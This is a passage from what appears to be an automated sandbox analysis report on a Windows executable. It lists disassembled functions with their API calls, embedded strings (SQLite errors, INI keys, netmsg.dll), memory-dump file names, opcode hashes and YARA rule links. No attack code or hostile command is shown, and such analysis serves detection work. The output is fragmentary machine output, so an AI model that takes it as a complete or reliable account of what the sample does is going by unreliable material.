                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                  • API String ID: 2780580303-317687271
                                                                                                                  • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                  • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                  • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                  • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                  Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                                  • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                  • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                                  • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                                                  • API String ID: 2767993716-572158859
                                                                                                                  • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                  • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                  • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                                  • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                  Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                  • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                  • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                  • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                    • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                  • API String ID: 3176057301-2039793938
                                                                                                                  • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                  • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                  • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                                  • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                  Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                  • unable to open database: %s, xrefs: 0042F84E
                                                                                                                  • database is already attached, xrefs: 0042F721
                                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                  • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                  • out of memory, xrefs: 0042F865
                                                                                                                  • database %s is already in use, xrefs: 0042F6C5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                  • API String ID: 1297977491-2001300268
                                                                                                                  • Opcode ID: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                                                                                  • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                  • Opcode Fuzzy Hash: 555983bd08e1e0f26dd17bbb53403158099364c4b4daee471fd2bbf0d1f998cc
                                                                                                                  • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                  Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                                  • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                                  • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                  • String ID: ($d
                                                                                                                  • API String ID: 1140211610-1915259565
                                                                                                                  • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                  • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                  • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                                  • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                  Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                  • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                  • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3015003838-0
                                                                                                                  • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                  • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                  • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                  • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                  Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00407E44
                                                                                                                  • memset.MSVCRT ref: 00407E5B
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                  • wcscpy.MSVCRT ref: 00407F10
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 59245283-0
                                                                                                                  • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                  • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                  • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                                  • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                  Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                  • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                  • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                  • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                  • free.MSVCRT ref: 004185AC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2802642348-0
                                                                                                                  • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                  • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                  • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                  • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                  Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                  • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                  • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                  • API String ID: 3510742995-3273207271
                                                                                                                  • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                  • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                  • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                  • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                  Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                                  • memset.MSVCRT ref: 00413ADC
                                                                                                                  • memset.MSVCRT ref: 00413AEC
                                                                                                                    • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                  • memset.MSVCRT ref: 00413BD7
                                                                                                                  • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                  • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                  • String ID: 3A
                                                                                                                  • API String ID: 3300951397-293699754
                                                                                                                  • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                  • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                  • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                  • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                  Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                  • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                  • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                  • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                  • String ID: strings
                                                                                                                  • API String ID: 3166385802-3030018805
                                                                                                                  • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                  • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                  Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00411AF6
                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                  • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                  • wcscat.MSVCRT ref: 00411B2E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                  • String ID: AE$.cfg$General$EA
                                                                                                                  • API String ID: 776488737-1622828088
                                                                                                                  • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                  • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                  • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                  • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                  Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040D8BD
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                  • memset.MSVCRT ref: 0040D906
                                                                                                                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                  • String ID: sysdatetimepick32
                                                                                                                  • API String ID: 1028950076-4169760276
                                                                                                                  • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                  • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                  • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                  • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                  Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                  • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                  • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                  • memset.MSVCRT ref: 0041BA3D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID: -journal$-wal
                                                                                                                  • API String ID: 438689982-2894717839
                                                                                                                  • Opcode ID: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                  • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                  • Opcode Fuzzy Hash: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                  • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                  Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                  • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                    • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                    • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                  Memory Dump Source
